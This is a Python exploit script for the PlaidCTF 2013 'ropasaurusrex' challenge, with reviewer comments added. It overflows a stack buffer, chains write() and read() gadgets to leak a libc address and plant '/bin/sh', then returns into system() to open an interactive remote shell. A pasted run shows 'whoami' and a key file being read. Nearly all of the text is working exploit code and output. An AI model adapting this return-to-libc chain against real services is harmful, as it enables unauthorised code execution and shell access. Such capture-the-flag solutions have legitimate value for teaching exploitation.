plaid ctf 2013 ropasaurusrex
  1. import os
  2. import struct
  3. from socket import *
  4. import time
  5.  
def GOT_SHELL(sock):
    """Interactive relay between the local prompt and `sock`.

    Each line typed at the "> " prompt is sent to the peer with a trailing
    newline; after a fixed 0.5 s pause the reply is read once and printed.
    The loop ends after the user enters 'quit' -- that line is still sent
    to the peer before returning, and an empty line sends a bare newline.
    A peer that sends nothing leaves the blocking recv hanging.
    """
    while True:
        line = raw_input("> ")
        sock.send(line + "\n")
        # Give the peer a moment to answer before the single blocking recv.
        time.sleep(0.5)
        # NOTE(review): 0x4096 is 16534 bytes, not 4096 -- looks like a
        # hex/decimal mix-up; harmless as a recv upper bound, so kept as is.
        print sock.recv(0x4096)
        if line == 'quit':
            return
  14.  
# 32-bit little-endian pack/unpack helpers. `up` needs exactly 4 bytes
# (struct.error otherwise) and returns a 1-tuple, hence the [0] below.
p = lambda x : struct.pack("<L", x)
up = lambda x : struct.unpack("<L", x)

# Target endpoint; per the author's comment this is their own lab host.
# socket/AF_INET/SOCK_STREAM come from the star import at the top of the file.
ip = "192.168.0.103"
port = 12312 # my server

s = socket(AF_INET, SOCK_STREAM)
s.connect((ip, port))

# Earlier libc offsets the author noted; superseded by OFFSET below.
#write = dfcd0
#system = 41280

# Distance between write and system in the target's libc, as given by the
# author. Specific to that libc build; nothing in this script verifies it.
OFFSET = 0x9ea50

# Addresses in the challenge binary, as recorded by the author.
freespace = 0x08049629   # writable scratch area that cmd is read into in stage 1
ppppr = 0x080484b5       # presumably a pop x4; ret gadget (from its name); ppppr+1 is used below
write = 0x0804830c       # PLT entries used by the chain
read = 0x0804832c
write_got = 0            # filled in from the stage-1 leak
system = 0               # NOTE(review): never assigned; stage 2 computes write_got - OFFSET inline
cmd = "/bin/sh"
sh = 0x0804867f          # unused: the p(sh) line in stage 2 is commented out

############################################################################ stage1
# 0x88 bytes of filler plus "BBBB" put the return address at offset 0x8c
# (stage 2 uses "A"*0x8c directly for the same slot).
payload = ""
payload += "A"*0x88
payload += "BBBB"

# write(1, 0x08049614, 4): sends the 4 bytes stored at 0x08049614 (the GOT
# slot the author labels write_got) back over the connection.
payload += p(write) # ret
payload += p(ppppr+1) # pppr
payload += p(1) # stdout
payload += p(0x08049614) # get write_got
payload += p(4) # size

# read(0, freespace, len(cmd)): stores the cmd string sent below into freespace.
payload += p(read) # ret
payload += p(ppppr+1) # ppr
payload += p(0)
payload += p(freespace)
payload += p(len(cmd))

payload += p(0x0804841d) # return to vuln function

print "[*] Sending Stage 1 . . ."
s.send(payload)
time.sleep(0.5)

print "[*] Sending Command "+cmd+" . . ."
s.send(cmd)

# NOTE(review): assumes the 4 leaked bytes arrive in a single recv; fewer
# or more bytes make `up` raise struct.error. The log label is misleading:
# this is the leaked address of write, system is derived from it in stage 2.
write_got = up(s.recv(2048))[0]
print "[!] system addr : "+hex(write_got)

############################################################################ stage2
payload = ""
payload += "A"*0x8c
payload += p(write_got - OFFSET) # write system   <- return address: leaked write addr minus OFFSET
payload += "AAAA"                 # placeholder return address for the call
#payload += p(sh)                 # alternative argument the author left commented out
payload += p(freespace)           # argument: cmd as read into freespace in stage 1

#####################################################################################

print "[*] Sending Stage 2 . . ."
s.send(payload)
GOT_SHELL(s)

raw_input("Got Shell?")
# Session transcript kept by the author; a bare string expression, so it is
# a no-op at runtime.
"""
C:\Users\Administrator\Desktop\sweetchip>exploit.py
[*] Sending Stage 1 . . .
[*] Sending Command /bin/sh . . .
[!] system addr : 0xb7649cd0L
[*] Sending Stage 2 . . .
> whoami
sweetchip

> cat /home/sweetchip/key
This is K3y

>
"""